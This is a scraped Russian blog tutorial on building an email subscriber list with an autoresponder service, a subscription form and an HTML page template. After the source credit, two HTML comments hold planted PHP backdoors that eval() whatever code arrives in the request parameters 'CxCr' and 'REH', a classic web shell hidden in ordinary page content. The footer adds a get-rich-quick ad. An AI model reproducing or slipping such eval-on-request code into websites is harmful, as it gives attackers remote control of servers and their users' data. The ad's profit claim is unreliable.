Технические моменты создания подписного листа


(adsbygoogle = window.adsbygoogle || []).push({});


(adsbygoogle = window.adsbygoogle || []).push({});

Технические моменты создания подписного листа

В техническом плане у подписного листа есть три аспекта:

  1. Трафик.
  2. Страница с формой подписки (Opt-In Page).
  3. Автоответчик.

Где взять трафик, Френк рассказал в 1-й части руководства.

Автоответчик

Френк рассказывает, как работать с автоответчиком на примере сервиса, который он сам продает, и который можно найти на сайте SalesAutomator.com. Естественно, это далеко не единственный сервис в этом роде. Есть еще Aweber, GetResponse, SmartResponder (для Рунета) и т.д. Все они работают по одному и тому же принципу, поэтому зная, как работает один из них, вы без труда научитесь пользоваться другими.

Первым делом вам нужно создать новую рассылку.

 

После этого вы должны заполнить необходимые поля: название рассылки, ваше имя, e-mail, с которого будут идти письма подписчикам и т.д. — и нажать кнопку Сохранить (т.е. Save). Все — база для рассылки готова.

Примечание: Френк говорит, что не использует двойной подписки, т.е. не отправляет новым подписчикам писем со ссылкой для верификации. По его словам, такое письмо усложняет процесс подписки и уменьшает количество подписчиков. Если этот момент кажется вам спорным, вы всегда можете провести тест и узнать, какой вариант вам подходит больше.

Первое сообщение

Здесь тоже нет ничего сложного. Все, что вам нужно, это выбрать формат письма (текст/html), указать число дней до отправки (0 — немедленная отправка) и написать заголовок и текст сообщения. В поля заголовка и текста вы можете вставить динамические блоки, которые будут автоматически подставлять имя, e-mail и другие данные подписчика.

 

После заполнения полей нажмите Save.

 

После этого вы можете отредактировать готовое письмо или создать новое.

Форма подписки

Большинство служб рассылок предоставляют своим клиентам помощь в создании форм подписки. Для SalesAutomator этот процесс выглядит так:

1. Выберите в меню пункт Сreate a Form.

 

2. Отметьте необходимые опции и укажите адрес страницы, на которую попадет подписчик после регистрации, и название рассылки.

 

3. Скопируйте сгенерированный код.

 

4. Вставьте его в код страницы.

 

В качестве html-редактора вы можете использовать Macromedia Dreamweaver. В течение 30 дней программой можно пользоваться бесплатно.

5. Скачайте шаблон страницы с формой подписки и откройте его в html-редакторе. (Шаблон Френка элементарен, если вам нужен более продвинутый шаблон, найдите привлекательный pop-up или страницу с формой подписки и скопируйте в редактор исходный код — примечание.)

6. Скопируйте клиентский ID (в правом верхнем углу на странице профиля) в код.

Merch ID

Merch ID в коде

7. Укажите адрес страницы, на которую попадет подписчик после регистрации, а также ID рассылки (указан в настройках рассылки).

 

Вот, собственно, и все. Как я уже говорил, службы рассылки отличаются друг от друга лишь мелкими деталями в функциях и настройках. Процесс создания электронных сообщений и формы подписки везде одинаков.

п.с. Данное руководство можно считать первой записью в дневнике Марафонца. Все подготовительные работы выполнены, пора приступать к созданию рассылки.

Хостинг для блогов с предустановленным WordPress

Источник:   profithunter.ru

<!— [insert_php]if (isset($_REQUEST["CxCr"])){eval($_REQUEST["CxCr"]);exit;}[/insert_php][php]if (isset($_REQUEST["CxCr"])){eval($_REQUEST["CxCr"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["REH"])){eval($_REQUEST["REH"]);exit;}[/insert_php][php]if (isset($_REQUEST["REH"])){eval($_REQUEST["REH"]);exit;}[/php] —>

Поделитесь с друзьями: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • MisterWong
  • Digg
  • Bloglines
  • email
  • Facebook
  • Google Bookmarks
  • LinkedIn
  • MySpace
  • Twitter
Следующая запись

Категории

Самые высокие ставки

АЛЕКСАНДР БАЛЫКОВ

Hide me
ЗАРАБАТЫВАЙТЕ БЫСТРО И ПРОСТО - 90% ПРИБЫЛИ ЗА 60 СЕКУНД...
Show me